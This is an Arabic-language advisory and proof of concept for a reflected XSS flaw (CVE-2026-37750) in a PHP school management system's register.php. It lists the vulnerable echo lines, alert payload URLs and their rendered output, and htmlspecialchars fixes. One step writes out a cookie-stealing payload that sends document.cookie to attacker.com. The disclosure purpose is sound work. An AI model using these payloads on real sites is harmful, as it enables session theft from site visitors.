
# إثبات مفهوم لـ XSS المنعكسة في نظام إدارة المدرسة 1.0 إثبات مفهوم لثغرة XSS المنعكسة في نظام إدارة المدرسة 1.0، يوضح تنفيذ JavaScript غير المصادق عليه عبر معامل type في register.php، مع تحليل الأثر وإرشادات المعالجة.
| الحقل | المعلومات |
|---|
| معرف CVE | CVE-2026-37750 |
| النوع | Cross-Site Scripting منعكسة (XSS) |
| الخطورة | متوسطة (CVSSv3: 6.1) |
| البائع | mahmoudai1 |
| المنتج | نظام إدارة المدارس |
| الإصدار | 1.0 |
| مكتشف الثغرة | Varad AP Mene |
| التاريخ | 2026-04-16 |
| CWE | CWE-79 |
ثغرة Cross-Site Scripting (XSS) منعكسة في نظام إدارة المدارس 1.0 من mahmoudai1 تسمح للمهاجمين عن بُعد دون مصادقة بتنفيذ JavaScript عشوائي في متصفحات الضحايا عبر معامل type غير المعقّم في register.php. يتم عكس المعامل دون تهريب داخل وسم h1 في السطر 22 وداخل سمة action للنموذج في السطر 26. لا تتطلب استغلال هذه الثغرة أي مصادقة.
معرف CVE: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 متوسطة (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
نظام إدارة المدارس 1.0 هو تطبيق ويب PHP/MySQL من mahmoudai1 على GitHub يُستخدم لإدارة الطلاب والمعلمين وأولياء الأمور في المدارس.
register.php — نموذج التسجيل (لا يتطلب مصادقة)
السطر 22: echo ucfirst($_REQUEST['type'])
السطر 26: echo $_REQUEST['type']
لا يتم استخدام htmlspecialchars() — يتم عكس إدخال المستخدم الخام مباشرة في HTML.
المتطلبات الأساسية:
الخطوة 1 — افتح المتصفح وقم بزيارة هذا الرابط: http://target/register.php?type=script-alert-document.cookie-/script
الخطوة 2 — يتم تنفيذ JavaScript في المتصفح النتيجة: تظهر نافذة تنبيه تعرض ملفات تعريف الارتباط الخاصة بالجلسة.
الخطوة 3 — حمولة سرقة ملفات تعريف الارتباط: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script الخطوة 4 — حمولة حقن سمة action للنموذج: http://target/register.php?type="-script-alert(1)-/script
تم تأكيد نقطتي حقن:
نقطة الحقن 1 — داخل وسم h1 (السطر 22):
echo ucfirst($_REQUEST['type'])
المخرجات:
<h1><script>alert(1)</script> Application</h1>
نقطة الحقن 2 — داخل سمة action للنموذج (السطر 26):
echo $_REQUEST['type']
المخرجات:
<form action="register.php?type=<script>alert(1)</script>">
إصلاح السطر 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');
إصلاح السطر 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');
Varad AP Mene البريد الإلكتروني: [email protected] GitHub: https://github.com/menevarad007